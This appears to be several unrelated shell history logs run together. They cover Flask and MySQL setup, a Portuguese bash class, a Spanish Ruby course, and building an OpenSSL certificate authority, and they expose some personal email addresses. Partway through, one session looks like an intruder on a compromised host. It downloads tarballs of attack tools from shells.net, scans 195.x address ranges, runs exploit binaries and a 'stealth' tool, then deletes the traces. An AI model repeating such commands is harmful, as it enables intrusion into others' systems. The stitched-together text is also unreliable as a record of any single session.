+ls +ls +ls +ls +flask shell +flask_app shell +mysql -u reportcover -h mysql.server -p +mysql -u reportcover -hmysql.server -p +mysql -u reportcover -h reportcover.mysql.pythonanywhere-services.com -p +exit +pwd +ls +pip install flask-mail +pip install flask-mail --upgrade +exit +pwd +pip install pushjack +mkdir my_virtualenv +ls +pip install pushjack +rm -rf my_virtualenv/ +clear +pip install --user pwhich +pwd +ls +mkvirtualenv my_virtualenv +pip install pwhich +pip intall urllib3[secure] pyopenssl ndg-httpsclient pyasn1 +pip install urllib3[secure] pyopenssl ndg-httpsclient pyasn1 +pip3.4 install --user packagename +pip3.4 install --user reportcover +mkvirtualenv --python=python3.4 myvirtualenv +pip install pushjack +exit +pip install gcm +ls +ls +ls +m +ls +source ./bin/activate +pip install gcm +deactivate +virtualenv --relocatable +virtualenv--relocatable +source ./bin/activate +virtualenv --relocatable +deactiavate +deactivate +virtualenv --relocatable myvirtualenv +virtualenv --relocatable ../myvirtualenv +rm -rf myvirtualenv/ +ls +ls +mkvirtualenv --python=python3.4 myvirtualenv +ls +ls +ls +ls +ls +pip install gcm +pip install email +virtualenv --relocatable . +virtualenv --relocatable /home/reportcover/mysite +virtualenv --relocatable /home/reportcover/mysite/bin +ls +python gcm.py +pip install gcm +pip install flask +deactivate +ls +rm -rf myvirtualenv/ +ls +ls +ls +ls +virtualenv -p python3 env +pip install flask +ls +virtual env/bin/activate +virtualenv env/bin/activate +virtualenv ./env/bin/activate +rm -rf env +ls +virtualenv -p python3 env +ls +virtualenv ./env/bin/activate +rm -rf env +ls +ls +virtualenv -p python3 env +ls +source env/bin/activate +pip install flask +pip install gcm +deactivate +ls +rm -rf env +ls +ls +mkvirtualenv --python=python3.4 myvirtualenv +pip install flask +pip install gcm +pwd +ls +ls +ls +python mail.py +python gcm.py +pip install MySQLdb +pip install json +ls +ls +pip isntall json +pip install json +pip install flask_app +ls +ls +python flask_app.py +pip install MySQLdb +pip3.3 install --userspuh/MySQL-for-Python-3/archive/1.0.tar.gz +ls +python gcm.py +pip install pushjack +python gcm.py +pip install urllib2 +python gcm.py +deactivate +pip install --user pwhich +ls +source ../.virtualenvs/myvirtualenv/bin/activate +pip install pwhich +pip install urllib3[secure] pyopenssl ndg-httpsclient pyasn1 +pip install urllib2 +python gcm.py +python flask_app.py +pip install json +import json +pyton import json +import MySQLdb +pip install mysql-python +which pip +which python +python +pip install mysqlclient +python flask_app.py +pip install urllib2 +clear +python +pip install gcm +python gcm.py +python +pip install pushjack +python gcm.py +python +pip install email +python +python mail.py +python +python mail.py +python gcm_test.py +python test.py +python mail.py +python test.py +python mail.py +python test.py +clear +echo "# ReportCoverServer" >> READEME.md +git init +git add README.md +git commit -m "first commit" +git config --global user.email "yjsgoon@gmail.com" +git config --global user.name "JiSoo Yoon" +git add README.md +git commit -m "first commit" +git add . +git commit -am "first commit" +git status +git remote add originsgoon@ReportCoverServer.git +git push -u origin master +git remote add originsgoon/ReportCoverServer.git +git push -u origin master +git remote add originsgoon/ReportCoverServer.git +git push -u origin master +git status +git remote add originsgoon/ReportCoverServer.git +git push -u origin master +git remote add origin git@github.com:yjsgoon/ReportCoverServer.git +git push -u origin master +git init +git status +rm -rf .git +323 +echo "# ReportCoverServer" >> README.md +git init +git add . +git commit -m "first commit" +git remote set-url originsgoon/ReportCoverServer.git +git remote add originsgoon/ReportCoverServer.git +git push -u origin master +git log +ls +rm -rf READEME.md +ls +hpcc +locate hpcc +cat /usr/share/doc/hpcc/README.Debian +cp /usr/share/doc/hpcc/examples/_hpccinf.txt hpccinf.txt +vi hpccinf.txt +hpcc +orterun +sudo apt-get install openmpi-bin +hpcc +cat hpccoutf.txt +sudo apt-get install mc +mcedit hpccinf.txt +mpirun -np 2 --host localhost hpcc +/sbin/ifconfig +sudo apt-get install openssh-server +su +cat /proc/version +sudo apt-get install collectd +ssh-keygen +ls +cp id_rsa.pub authorized_keys +sync +top +less /tmp/d2c.context +ssh +ls +less experiment.out +ls +less hpccinf.txt +ls +less hpccoutf.txt +less experiment.out +less hpccinf.txt +ls +top +less hpccinf.txt +less experiment.out +quit +oo +ls +dir +didirs +dirs +less . +local .profile . +logout +exit +mkdir aula09 +mkdir aula14_02 +dir +ls +nome="Gustavo Bruning" +echo "seu nome e $nome" +exit +s=$((3*5)) +exit +ls +echo $nome +nome= "gustavo bruning" +nome="gustavo bruning" +echo $nome +nome="fabyulaxx eh feia" +echo $nome +exit +vi gustav0b +ls +mkdir aula16_02 +ls +vi +mc +mcdit +mcedit +vi +pico +nano +vi +vi +ls +vi gustavoluisbruningteloVIM +exit +echo $PATH + +echo $PATH +ls +mkdir bin +vi primeiro +ls +vi primeiro +ls +./primeiro +chmod 711 primeiro +./primeiro +gustav0b@lo:~/bin$ ./primeiro +bash: ./primeiro: Permission denied +gustav0b@lo:~/bin$ chmod 711 primeiro +gustav0b@lo:~/bin$ ./primeiro +Tue Feb 28 22:49:33 UTC 2012 +Filesystem 1K-blocks Used Available Use% Mounted on +/dev/xvdb2 9645708 7988940 1166784 88% / +none 9645708 7988940 1166784 88% /dev +none 9645708 7988940 1166784 88% /dev/pts +none 9645708 7988940 1166784 88% /dev/shm +none 9645708 7988940 1166784 88% /var/run +none 9645708 7988940 1166784 88% /var/lock +/dev/xvda1 9645708 7988940 1166784 88% /boot +/dev/xvdc1 9645708 7988940 1166784 88% /other +www-data@aci.pm.sc.gov.br:/var/www +sys 9645708 7988940 1166784 88% /home/jail/sys +gustav0b@lo:~/bin$ ^C +gustav0b@lo:~/bin$ +./primeiro +ls -l +chmod 710 primeiro +ls -l +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +exit +ls -l +ls +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +VARIAVEL= "estou sem ideias" +vi primeiro +VARIAVEL = "estou sem ideias" +$ VARIAVEL = "estou sem ideias" +VARIAVEL = "estou sem ideias" +VARIAVEL ="estou sem ideias" +VARIAVEL="estou sem ideias" +echo $VARIAVEL +echo $VARIAVEL$VARIAVEL +echo $VARIAVEL $VARIAVEL +HOJE=$(date) +echo "Hoje : $HOJE + +hoje + + +"HOJE=$(date)" +HOJE=`date` +echo "hoje : $HJOE +echo "hoje : $HJOE" +echo "hoje : $HOE" +echo "hoje e : $HOJE" +unset HOJE +echo HOJE +unset HOJE +echo $HJOE +echo $HOJE +cat -n primeiro +cat -n primeiro +cat primeiro +cat -n primeiro +pwd +find . -name *.list +find . -name *.autor +find -name autor +find -name primeiro +find -name aula +grep -i os +grep -i aula +grep echo primeiro +man cut +exit +primeiro +vi primeiro +primeiro +exit +vi primeiro +cat primeiro +cat -n primeiro +cat -s primeiro +cat primeiro +cat -n primeiro +vi primeiro +find -name comando +find -iname comando +find -type comando +find -type primeiro +find -type primeira +find -type f primeira +find -name primeira +find -name comando +find -name aula +find -name bin +find -name +find -name aula +ls +find -iname aula +find -name aula09 +ls +ls +ls -l +ls -l +cat primeiro +cat comando +exit +ls -l +ls +comandos +chmod 710 comandos +comandos +comando +vi comando +grep -i mostra +grep -i test primeiro +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +vi comandos +comandos +vi comandos +comandos +vi comandos +comandos +seq -s primeiro +seq -f primeiro +primeiro +vi primeiro +vi byulla +vi byubyu +byubyu +chmod 710 byubyu +byubyu +vi byubyu +byubyu +vi byubyu +byubyu +vi byubyu +exit +ls -l +ls -l +vi comandos +vi primeiro +vi comando +chmod 710 comando +vi comando +comando +vi cat +comando +vi cat +comando +cat +vi comando +comando +vi comando +comando +primeiro +comando +vi primeiro +comando +vi comando +comando +vi comando +cut -c primeiro +cut -c 2 primeiro +cut -c 1 primeiro +cut -c 1 comando +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +comando +VI COMANDO +vi comando +vi primeiro +vi comando +comando +vi comando +comando +vi comando +find -name comando +comando +vi comando +comando +vi comando +comando +ls -l +vi comandos +grep -i mando +grep -i .echo comando +grep -i .co comando +grep -i .find comando +vi comando +comando +grep -i .echo comando +grep -i .find comando +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +comando +grep -i '.find' comando +vi primeiro +vi comando +comando +vi comando +comando +vi primeiro +vi comando +comando +rev comandos +rev grep comandos +ls +vi comandos +grep -r teste primeiro +grep -i test primeiro +vi comandos +chmod 710 comandos +ls -l +chmod 710 cat +vi comando +comando +vi comandos +vi comando +comando +vi comando +vi primeiro +rm byulla +ls -l +ls +rm byubyu +ls +exit +ls +rm cat +ls +comando +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +exit +ls +ls +comando +vi comando +comando +vi comando +comando +vi comando +comando +grep -v [test] primeiro.txt +grep -v [test] primeiro +grep -v test primeiro +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +grep -i test primeiro.txt +grep -i test primeiro +pwd +vi primeiro +vi new +new +vi new +new +vi new +new +vi new +new +vi new +new +vi new +new +vi new +new +vi new +new +vi new +new +vi new +new +vi new +new +vi new +new +echo "linux" > new +rev new +echo abc | rev +abc | rev +vi new +new +vi new +rev comandos +rev comandos.txt +echo rev abcd +echo abcd |rev +echo abcd | rev +vi new +exit +primeiro +vi primeiro +ls l-s +ls -l +vi primeiro +seq 10 +seq 10 primeiro +seq -s primeiro +seq -s 10 primeiro +seq -f 10 primeiro +seq -f primeiro +seq -f 100 primeiro +seq -f 100 comando +seq -f comando +pwd +sed -n +sed -n +sed -n [quiet] primeiro +sed -n quiet primeiro +sed -n quiet primeiro.txt +sort primeiro +chmod 711 comando +chmod 711 primeiro +chmod 711 comandos +ls -l +pwd primeiro +pwd +primeiro pwd +vi comando +comando +vi new +chmod 711 new +ls -l +new +vi new +new +vi new +new +vi new +new +grep -v [aeiou] primeiro +grep -v [aeiou] primeiro.txt +grep -v [aeiou] comando +grep -v [test] primeiro +grep -v test primeiro +grep -i teste primeiro +grep -i test primeiro +vi comando +comando +vi comando +comando +vi comando +comando +vi new +new +vi new +new +vi new +new +vi new +vi comandos +vi comando +seq 1 5 +echo seq 1 5 +exit +ls +primeiro +ls -l +ls +exit +ls +sort -n primeiro +tr a-z A-Z gustavo +echo gustavobruning | tr aeiou AE +echo gustavobruning | tr aeiou GU +echo gustavo bruning | tr aeiou GU +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +comando +vi new +cat primeiro | sort -g +vi new +vi teste +comando +vi new +new +cat teste | sort -n | uniq -ui +cat teste | sort -n | uniq -u +cat teste | sort -g | uniq -i +cat teste | uniq -i +echo cat teste | uniq -i +vi new +new +vi teste-uniq +uniq -cd teste-uniq.txt +uniq -cd teste-uniq +echo uniq -cd teste-uniq +uniq -cd teste-uniq +chmod 710 teste-uniq +uniq -cd teste-uniq +vi comando +exit +ls +comando +vi comando +comando +vi comando +comando +vi comando +comando +vi teste +chmod 710 teste +ls -l +vi comando +comando +vi teste +comando +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +vi new +new +vi new +new +vi new +vi comando +comando +exit +comando +ls +rm teste-uniq +ls +n1=6 +n2=7 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +n1=9 +test "$n1" -gt "$n2" && echo "maior" || echo "menor" +gustav0b@lo:~/bin$ n1=6 +gustav0b@lo:~/bin$ n2=7 +gustav0b@lo:~/bin$ test "$n1" -gt "$n2" && echo "maior" || echo "menor" +menor +gustav0b@lo:~/bin$ n1=9 +gustav0b@lo:~/bin$ test "$n1" -gt "$n2" && echo "maior" || echo "menor" +maior +gustav0b@lo:~/bin$ n1=6 +n1=6 +test $n1 -lt $n2 || echo "menor" +test $n1 -lt $n2 && echo "menor" +n1=9 +test $n1 -lt $n2 || echo "menor" +n1=6 +test $n1 -lt $n2 || echo "menor" +echo "informe usuario:"; read user; +test "$user" = "redes" && echo "user: $user" || echo "user: errado" +echo "informe usuario:"; read user; +test "$user" = "redes" && echo "user: $user" || echo "user: errado" +gustav0b@lo:~$ echo "informe usuario:"; read user; +gustav0b@lo:~$ test "$user" = "redes" && echo "user: $user" || echo "user: errad o" +user: errado +gustav0b@lo:~$ echo "informe usuario:"; read user; informe usuario: +gustav0b@lo:~$ test "$user" = "redes" && echo "user: $user" || echo "user: errado" +user: redes +gustav0b@lo:~$ +id1=10 +id2=20 +vi idades +exit +ls +comando +vi comando +comando +exit +ls +ls +comando +vi comando +vi teste +comando +vi comando +cat teste | rev figueirense +cat teste | figueirense rev +cat teste +exit +ls +vi comando +comando +vi teste +comando +vi comando +comando +vi comando +comando +vi comando +comando +vi comando +vi teste +vi comando +comando +wc -l teste +wc -c teste +wc -l comando +comando +cat -n comando +seq teste +seq -s teste +seq -f teste +seq -f last +seq -f teste 10 +seq -f "teste" 10 +ls +vi comando01 +chmod x+ comando01 +chmod 710 comando01 +seq -f comando +seq -f comando 2 +seq -f "comando" 2 +ls +rm comando01 +ls +vi new +new +vi new +new +exit +ls +sort -f teste +comando +sed -f teste +AGORA | sed agora +echo AGORA | sed agora +echo AGORA | sed aagora +sed -d teste +sed d teste +sed n teste +sed n new +sed n comandos +cat teste +sort teste +vi teste +cat teste +sort teste +ls +vi new +new +vi new +new +vi new +new +cat teste +vi teste +cat +cat teste +uniq teste +uniq -i teste +uniq -d teste +uniq -u teste +vi comando +vi teste +wc vi comando +vi comando +comando +vi comando +comando +gustavobruning | rev gustavobruning +gustavobruning |rev +gustavobruning |rev +man rev +rev -h +rev -help +help rev +rev man +man cat +cat -h +vi new +new +echo "texto" | rev +seq 3 +seq -s, 10 -2 0 +exit +ls +sort -n teste +sort -f teste +sort -n teste +vi comando +comando +exit +man rev +rev gustavobruning +ls +ls +comando +seq 1 5 +seq -f 1 5 +seq -s "," 10 +vi comando +comando +gustavobruning | rev +rev gustavobruning +echo gustavobruning | rev +vi comando +comando +vi comando +comando] +comando +vi teste +comando +vi teste +comando +cat comando +exit +ls +comando +vi comando +exit +comando +testaArquivox +testaArquivos +man test +ls +exit +ls +vi exercicio +exercicio +chmod 710 exercicio +exercicio +vi exercicio +exercicio +vi exercicio +exercicio +vi exercicio +exercicio +vi exercicio4 +chmod 710 exercicio4 +exercicio4 +exit +ls +comando +ls +exit +ls +comando +haiuehae +aheiauheauiheaiuehauie +comando +num=7 +num2=9 +if teste $hum -it $num2; then echo "menor"; else echo "maior"; fi +vi aula_1303 +aula_1303 +chmod +x aula_1303 +aula_1303 +vi aula_1303 +vi if [ 5 -lt 8 ] +if [ 5 -lt 8 ]; then echo "menor"; else echo "maior"; fi +gustav0b@local:~/bin$ if [ 5 -lt 8 ] +> then +> echo "menor" +> else +> echo "maior" +> fi +menor +vi aula_1303 +aula_1303 +vi aula_1303 +vi aula1303 +chmod +x aula1303 +aula1303 +vi relacao 3 5 +relacao 3 5 +chmod +x relacao 3 5 +rm relacao 3 5 +ls +relacao35 +vi relacao 35 +vi relacao35 +relacao35 +chmod +x relacao35 +relacao35 +vi relacao35 +relacao35 +vi relacao35 +exit +ls +aula +aula2 +comando +vi comando +ls +aula09 +vi aula09 +ls +teste +zerador.sh +exit +ls +vi aula2 +ls +duifj +comando +vi comndo +vi comando +vi comando +vi comando +vi comando +ls +ls +aula2 +vi aula2 +aula2 +vi aula2 +vi aula +aula +aula2 +ls +aula3 +menu +comando +vi comando +exit +rails -v +ruby -v +rvm -v +git -v +git --version +chsh +exit +ls +ls +exit +exit +ls -l +ls +ls -l +vim ciao.txt +ls +lsfsfsfsciafasfasgfagwrhewhwedgsdgadgadgagadgadgagfadfgacd .. +pwd +ls +ls -l +ls +su ataru +chsh +vim /etc/passwd +less /etc/shell +less /etc/shells +chsh +exit +echo $SHELL +chsh +echo $SHELL +chsh +echo $SHELL +exit +echo $SHELL +rvm -v +ruby -v +rvm list +rvm gemset list +pwd +exit +rvm -v +rvm gemset create fran +rvm gemset name +rails -v +su root +exit +exit +ls -l +pwd +rvm -v +rvm gemset list +rvm gemset use ciao +rvm gemset name +rvm gemset use railsgundam +ls -l +rvm gemset list +rvm gemset use rails3gundam +list +ls +ls -l +echo $GEM_PATH +LS -L +ls -l +ls -l +ls -l +ls -la +pwd +vim .bash_history +pwde +pwd +git --version +su ataru +exit +ls -l +rvm gemset name +rvm gemset create fron +echo $GEM_PATHJ +echo $GEM_PATH +exit +rvm -v +exit +$rvm -v +rvm -v +git --version +$ ruby -v +ruby -v +rails -v +midir proyecto_rails +mkdir proyecto_rails +rails new primera_ap +ms l +ms -l +ls -l +ls -l +pwd +ls -l +rails s -p 3003 +lsb_release -irc +echo $shell +echo $SHELL +ls +$ man hier +man hier +pwd +vim +vim +ls +vim test +ls +vim test2 +vim test +vim test +vim test +vim test +ruby -v +ruby 1.9.2p290 (2011-07-09 revision 32553) [i686-linux] +rails -v +rvm -v +git -v +Git -v +Git -version +Git --version +Git --version +-Git -v +git -v +Git --versionGit --versiongit -v +Git -v +Git -version +Git -version +Git --versiongit -version; +rails new Tijuana_app +vim +vim +:mv fotos imagenes +$mv fotos imagenes +:$mv fotos imagenes +ls +$mv fotos imagenes +:$mv fotos imagenes +vim +vim +vim +vim ju* +vim juego_de_dados +ruby ju* +pwd +ls +ls +ruby juego_de_dados +vim ju* +ls -a +ls -l +ls -la +vim juego_de_dados +vim juego_de_dados.rb +ls +ls -ls +ls -la +vim juego_de_dados.rb +rm .ju* +ls -l +rm juegos_de_dados.rb +ruby juego_de_dados.rb +vim ju* +juego_de_dados +ruby juego_de_dados.rb +git add . +git commit -m "Creacion de las variables de la computadora y el jugador" +git log +:q! +irb +exit +git config +git config --global manufran78 "Francisco Gomez" +git config --global user.name "manufran78" +git config --global user.email manufran@me.com +ls +git init +ls -la +drwxrwxr-x 7 francisco francisco 4096 May 4 10:20 .git +drwxrwxr-x 7 francisco francisco 4096 May 4 10:20 .git +drwxrwxr-x 7 francisco francisco 4096 May 4 10:20 .git +rwxrwxr-x 7 francisco francisco 4096 May 4 10:20 .git +git add . +git status +git commit -m +git commit -m "primero commit" +git log +git remote add origin git@github.com:manufran78/primera_ap +git push -u origin master +mkdir ruby +vim juegos_de_dados +-mv juegos_de_dados juegos_de_dados.rb +mv juegos_de_dados juegos_de_dados.rb +ls +git init +git add . +git commit -m "Creacion del primer archivo de juego de los dados" +puts "Bienvenido al Juego de Dados" +vim +ls +vim juego_de_dados.rb +vim juego_de_dados.rb +ruby juego_de_dados.rb +vim juego_de_dados.rb +git log +vim ju* +ruby juego_de_dados.rb +vim ju* +ruby juego_de_dados.rb +ruby juego_de_dados.rb +vim ju* +ruby juego_de_dados.rb +vim ju* +ruby juego_de_dados.rb +ruby juego_de_dados.rb +vim ju* +vim ju* +vim juego_de_dados.rb +vim ju* +vim ju* +ls -l +ls -la +rm .ju* +ls ls +ls l +ls -l +vim ju* +juego_de_dados.rb +ruby juego_de_dados +ruby juego_de_dados.rb +ls +ruby juego_de_dados +vim ju* +juego_de_dados.rb +ruby juego_de_dados.rb +vim ju* +git add . +git commit -m "Dos Dados" +git remote add origin manufran@me.com +git push -u origin +juego_de_dados.rb +ruby juego_de_dados.rb +vim ju* +ruby juego_de_dados +ruby juego_de_dados.rb +vim ju* +ruby juego_de_dados.rb +vim ju* +vim ju* +exit +ls +ruby juego_de_dados.rb +irb +vim j* +ruby juego_de_dados.rb +vim ju* +ruby juego_de_dados.rb +vim ju* +ruby juego_de_dados.rb +vim ju* +ruby juego_de_dados.rb +vim ju* +ruby juego_de_dados.rb +git add . +git commit -m "Juego de dados ultma version" +git log +git remote add origin gitgit remote add origin git +git push -u origin master +git remote add origins_fran.git +git push -u origin master +ls -l +vim config +git status +ls -l +git rm juegos_de_dados.rb +git status +git commit -m "borro el archivos que no me sirve" +git status +git log +vim config +ssh-keygen -t rsa -C "manufran@me.com" +ls -l +vim id_rsa.pub +ls +git log +vim config +git remote add origins_fran.git +git push -u origin master +irb +git status +vim ju* +vim +git clone git@github.com:Astr0surf3r/juego_dados.git +ruby juego_dados.rb +ls +Ejercicios Curso "Rumbo a Ruby On Rails" +(Ejercicios para el 11 de mayo 2013) +01. Crear un pequeño programa en Ruby que muestra el propio nombre y que puede ejectuar solo el dueño de lo +archivo poniendo en el archivo el permiso 700. +02. Escribìr un programa en Ruby que pide el nombre de usuario, entonces el primer apellido, y luego el +segundo apellido. Por último, debe saludar al usuario con su nombre completo. +03. Escribir un programa en Ruby que calcule cuántas horas hay en un año. +04. Escribir un programa en Ruby que calcule cuántos minutos hay en una década. +05. Modificar el programa de los dados que hicimos en la aula el pasado 4 de mayo donde antes de pedir el +nombre de lo usuario tiene que escoger si jugar con un dado o dos dados +06. Explicar como se agrega la llave ssh a tu computadora para que se comunique con Github y explicar donde +se agrega en Github? +07. Crear un archivo Ruby vacìo y llamarlo prueba.rb e inicializa Git por subir el archivo en Github. +08. Cual es el comando para verificar en cual 'branch' estoy trabajando? +09. Crea un nuevo branch llamado 'llena-archivo' para modificar el archivo del punto 07 +10. En el archivo prueba.rb escribir .puts 3 + 1. y guardar el archivo +11. Pasa al branch 'master' y merge el branch 'llena-archivo' en el branch 'master' +irb +ls +ruby juego_dados.rb +rby juego_dados +ruby new Francisco +ruby mkdir franciscoruby +ruby cd .. +ls +ruby juego_dados +ruby rubyfran +ruby rubyfran.rb +vim +ls -l +vim +ls -l +chgrp group franruby.rb +chgrp francisco franruby.rb +0 +ls -l +chgrp francisco franruby.rb +ls -l +chmod u+x franruby.rb +ls -l +chmod g-rw franruby.rb +ls -l +chmod o-r franruby.rb +ls -l +vim +ls- l +ls -l +vim +ls -l +vim +primernombre = gets.chomp +puts "=> Hola + primernombre + cual es tu primer apellido?" +primerapellido = gets.chomp +puts "=> Hola + primernombre + primerapellido + cual es tu segundo apellido?" +segundoapellido = gets.chomp +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ls -l +vim +vim +ruby franruby.rb +e rubyfran +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby franruby.rb +vim +ruby horas.rb +vim +ruby horas.rb +vim +ruby horas.rb +vim +ruby horas.rb +vim +ruby horas.rb +vim +ruby horas.rb +vim +ruby horas.rb +vim +ruby horas.rb +vim +irb +vim +irb +vim +ruby horas.rb +vim +ruby horas.rb +vim +ruby horas.rb +vim +ruby decada.rb +vim +ruby juego_de_dos_dados.rb +vim +ruby juego_de_dos_dados.rb +vim +ruby juego_de_dos_dados.rb +vim +ruby juego_de_dos_dados.rb +vim +ruby juego_de_dos_dados.rb +ruby juego_de_dos_dados.rb +vim +ruby juego_de_dos_dados.rb +vim +ruby juego_de_dos_dados.rb +vim +vim +vim +ls -l +vim +ruby juego_de_dados.rb +ruby juego_de_dos_dados.rb +git config --global manufra78 Francisco +git config --global user.name manufran78 +git config --global user.email manufran@me.com +git init +vim +e prueba.rb +w prueba.rb +ls -l +vim +ls l +ls- l +ls -l +w +passwd +uname -a +cat /etc/issue +w +ls -a +ps x +pwd +top +w +pwd +ls -a +wget +wgetshells.net/rider.tgz +tar zxvf rider.tgz +./scan 195.31 +./scan 195.32 +./scan 195.33 +wgetshells.net/90.tgz +tar zxvf 90.tgz +tar xvf 90.tgz +./90 +wgetshells.net/xpl.tar.tgz +wgetshells.net/xpl.tar.tz +wgetshells.net/xpl.tar.gz +tar xvf xpl.tar.gz +./n +./n +./n +./x +./n +./x +ls -a +rm -rf xpl.tar.gz xpl rider.tgz 90.tgz rider 90 +wgetshells.net/x.tar.gz +w +w +w +wget www.liveshells.net/x.tar.gz +tar zxvf x.tar.gz +PATH=:PATH bash +PATH=:PATH bash +./stealth 80 +./stealth 22 +exit +ps aux +ssh +ping +vim test.sh +cat test.sh +echo "echo toto" > test.sh +df -h +echo "echo toto" > test.sh +echo "echo toto" > test.sh +sh test.sh +openssl genrsa -aes256 -out caincharge/private/cainchargekey.pem 4096 +chmod 400 caincharge/private/cainchargekey.pem +openssl req -config caincharge/openssl.cnf -new -sha256 -key caincharge/private/cainchargekey.pem -out caincharge/csr/cainchargecsr.pem +openssl ca -config openssl.cnf -extensions v3_intermediaire_ca -days 3650 -notext -md sha256 -in caincharge/csr/cainchargecsr.pem -out caincharge/certs/cainchargecert.pem +chmod 444 caincharge/certs/cainchargecert.pem +cat ins +cat index.txt +cat caincharge/index.txt +openssl x509 -noout -text -in caincharge/certs/cainchargecert.pem +apt-get update +openssl ca -config openssl.cnf -extensions v3_intermediaire_ca -days 3650 -notext -md sha256 -in caincharge/csr/cainchargecsr.pem -out caincharge/certs/cainchargecert.pem +ls +ls +rm -rf ca +ls +mkdir /root/ca +mkdir certs crl newcerts private +chmod 700 private/ +touch index.txt +echo 1000 > serial +cp /home/geek/root_ca.txt openssl.cnf +openssl genrsa -aes256 -out private/ca.key.pem 4096 +chmod 400 private/ca.key.pem +openssl req -config openssl.cnf -key private/ca.key.pem -new -x509 -days 7300 -sha256 -extension v3_ca -out certs/ca.cert.pem +openssl req -config openssl.cnf -key private/ca.key.pem -new -x509 -days 7300 -sha256 -extensions v3_ca -out certs/ca.cert.pem +chmod 444 certs/ca.cert.pem +openssl x509 -noout -text -in certs/ca.cert.pem +mkdir /root/ca/intermediate +mkdir certs crl newcerts private +chmod 700 +chmod 700 private/ +touch index.txt +echo 1000 > serial +echo 1000 > /root/ca/intermediate/crlnumber +cp /home/geek/int.txt openssl.cnf +openssl genrsa -aes256 -out intermediate/private/intermediate.key.pem 4096 +chmod 400 intermediate/private/intermediate.key.pem +chmod 400 intermediate/private/intermediate.key.pem +openssl req -config intermediate/openssl.cnf -new -sha256 -key intermediate/private/intermediate.key.pem -out intermediate/csr/intermediate.csr.pem +mkdir intermediate/csr +openssl req -config intermediate/openssl.cnf -new -sha256 -key intermediate/private/intermediate.key.pem -out intermediate/csr/intermediate.csr.pem +openssl ca -config openssl.cnf -extensions v3_intermediate_ca -days 3650 -notext -md sha256 -in intermediate/csr/intermediate.csr.pem -out intermediate/certs/intermediate.cert.pem +cat index.txt +openssl x509 -noout -text -in intermediate/certs/intermediate.cert.pem +openssl verify -CAfile certs/ca.cert.pem intermediate/certs/intermediate.cert.pem +cat intermediate/certs/intermediate.cert.pem certs/ca.cert.pem > intermediate/certs/ca-chain.cert.pem +chmod 444 intermediate/certs/ca-chain.cert.pem +ls /home/geek/ +ls +ls /home/geek/ +openssl ca -config intermediate/openssl.cnf -extensions server_cert -days 375 -notext -md sha256 -in /home/geek/serverprod.csr -out intermediate/certs/serverprod.crt +ca intermediate/index.txt +cat intermediate/index.txt +cat intermediate/index.txt +openssl x509 -noout -text -in /home/geek/serverprod.csr +rm intermediate/certs/serverprod.crt +openssl ca -config intermediate/openssl.cnf -extensions server_cert -days 375 -notext -md sha256 -in /home/geek/serverprod.csr -out /home/geek/serverprod.crt +vim intermediate/index.txt +rm /home/geek/serverprod.crt +openssl ca -config intermediate/openssl.cnf -extensions server_cert -days 375 -notext -md sha256 -in /home/geek/serverprod.csr -out /home/geek/serverprod.crt +scp /home/geek/serverprod.crt geek@ +openssl x509 -noout -text in /home/geek/serverprod.c +openssl x509 -noout -text in /home/geek/serverprod.crt +openssl x509 -noout -text -in /home/geek/serverprod.crt +openssl verify -CAfile intermediate/certs/ca-chain.cert.pem /home/geek/serverprod.crt +scp intermediate/certs/ca-chain.cert.pem geek@ +cat intermediate/certs/ca-chain.cert.pem +cat intermediate/certs/ca-chain.cert.pem | less +cat /home/geek/serverprod.c >> intermediate/certs/ca-chain.cert.pem +cat /home/geek/serverprod.crt >> intermediate/certs/ca-chain.cert.pem +cat intermediate/certs/ca-chain.cert.pem | less +scp intermediate/certs/ca-chain.cert.pem geek@ +vim intermediate/certs/ca-chain.cert.pem +vim intermediate/certs/ca-chain.cert.pem +cat intermediate/certs/ca-chain.cert.pem | less +scp intermediate/certs/ca-chain.cert.pem geek@ +scp intermediate/certs/ca-chain.cert.pem geek@ +openssl verify -CAfile intermediate/certs/ca-chain.cert.pem /home/geek/serverprod.crt +scp intermediate/certs/ca-chain.cert.pem geek@ +scp intermediate/certs/ca-chain.cert.pem geek@ +scp intermediate/certs/ca-chain.cert.pem geek@ +shutdown -h now +shutdown -h now +ls +ls ca/ +ls /etc/ssl/ +ls +ls +vim openssl.cnf +ls +ls +ls +rm -rf ca +ls +locat Trash +locate Trash +ls +ls +mkdir ca +s +ls +rm -rf +rm -rf ca/ +ls +mkdir -p ca/root-ca/private ca/root-ca/db crl certs +ls +ls ca/ +ls +ls +chmod 700 ca/root-ca/private/ +ls +ls +cp /dev/null ca/root-ca/db/root-ca.db +cp /dev/null ca/root-ca/db/root-ca.db.attr +echo 01 > ca/root-ca/db/root-ca.crt.srl +echo 01 > ca/root-ca/db/root-ca.crl.srl +git clonestefanholek/pki-exemple-1 +apt-get install git +apt-get update +apt --fix-missing +apt-get --fix-missing +apt-get install git +git clonestefanholek/pki-exemple-1 +ls +git clonestefanholek/pki-example-1 +ls +ls pki-example-1/ +ls pki-example-1/etc/ +vim pki-example-1/etc/root-ca.conf +ls +ls ca/ +ls +ls +mkdir int-ca +ls +ls +ls +ls +cp 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pki-example-1/etc/root-ca.conf +vim pki-example-1/etc/server.conf +vim pki-example-1/etc/signing-ca.conf +vim pki-example-1/etc/root-ca.conf +vim pki-example-1/etc/root-ca.conf +ms +ls +ls pki-example-1/etc/ +ls +vim ca/root-ca.conf +vim ca/int-ca.conf +vim ca/root-ca.conf +vim ca/int-ca.conf +ls +vim ca/int-ca.conf +vim ca/root-ca +vim ca/root-ca.conf +ls +vim 